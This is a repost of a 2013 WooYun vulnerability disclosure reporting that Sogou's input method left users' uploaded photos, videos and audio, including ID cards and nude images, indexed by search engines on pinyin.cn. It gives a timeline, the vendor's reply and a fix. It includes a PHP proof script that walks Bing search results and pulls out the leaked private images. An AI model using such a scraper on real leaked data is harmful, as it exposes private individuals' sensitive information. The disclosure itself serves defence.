搜狗输入法收集用户隐私信息,未屏蔽爬虫

搜狗移动输入法被发现将用户隐私数据如图片、视频、音频上传到云端,由于网站安全设计问题,它没有屏蔽搜索爬虫的索引,导致许多用户的私人消息泄露,安全研究人员从搜狗的pinyin.cn网站上发现了身份证、裸体照,甚至检举信。目前pinyin.cn已经关闭了外部访问。但问题是为什么搜狗要保存这些个人隐私数据?除了移动版外,它的桌面版是否也有类似的上传私人数据功能?

 

漏洞概要关注数(37) 关注此漏洞

缺陷编号: WooYun-2013-23081

漏洞标题: 搜狗输入法可导致大量用户敏感信息泄露

相关厂商: 搜狗

漏洞作者: 镇长

提交时间: 2013-05-04 18:21

公开时间: 2013-06-05 16:00

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org

Tags标签: 无


漏洞详情

披露状态:

 

2013-05-04: 细节已通知厂商并且等待厂商处理中
2013-05-05: 厂商已经确认,细节仅向厂商公开
2013-05-15: 细节向核心白帽子及相关领域专家公开
2013-05-25: 细节向普通白帽子公开
2013-06-04: 细节向实习白帽子公开
2013-06-05: 细节向公众公开

简要描述:

搜狗输入法信息发送过程存储了相对应的信息在云端,但由于相应配置及其他原因造成会话信息【图片、视频、音频】泄露。其中很多身份证、果照、还有检举信!!!

详细说明:

搜狗输入法信息发送过程存储了相对应的信息,由于不严谨造成信息被搜索引擎抓取。

Google或者bing:

输入关键词:site:pinyin.cn

[bing=3,700 条结果],[Google=约 1,120 条结果 ]

漏洞证明:

为了验证方便,写了一段代码这个是针对bing的结果弄的。

直接这种形式去查看吧,挺方便还支持翻页哦亲!

<?php
set_time_limit(0);
$url = 'http://cn.bing.com/search?q=site%3apinyin.cn&qs=n&pq=site%3apinyin.cn&sc=0-4&sp=-1&sk=&first={ddddd}1&FORM=PERE';

$i = $_GET['i'];
	$api = file_get_contents(str_replace('{ddddd}',$i,$url));
	preg_match_all('/<a href=\"http:\/\/pinyin.cn\/([a-zA-Z0-9]+)?\"/',$api,$a);
	foreach($a[1] as $v) {
		$api = file_get_contents('http://pinyin.cn/'.$v);
		preg_match('/<a target="_blank" href="(.*?)">/',$api,$aa);
		if($aa) {
			echo '<br>';
			echo '<a target="_blank" href="http://pinyin.cn/'.$v.'">http://pinyin.cn/'.$v.'</a>:';
			echo '<img class=\'round_img\' id=\'round_img\' src="'.$aa[1].'" border=0 max-width="210px" max-height="210px" />';

		}
}

根据网友6月15日16:49反馈,上面的代码已无法搜到内容。

 

修复方案:

短信发送时可以带一组查看码(如4位字符),打开链接时输入查看码才能查看内容。

版权声明:转载请注明来源 镇长@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-05-05 12:20

厂商回复:

收到,感谢反馈

最新状态:

暂无

 

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注


Verify Code   If you cannot see the CheckCode image,please refresh the page again!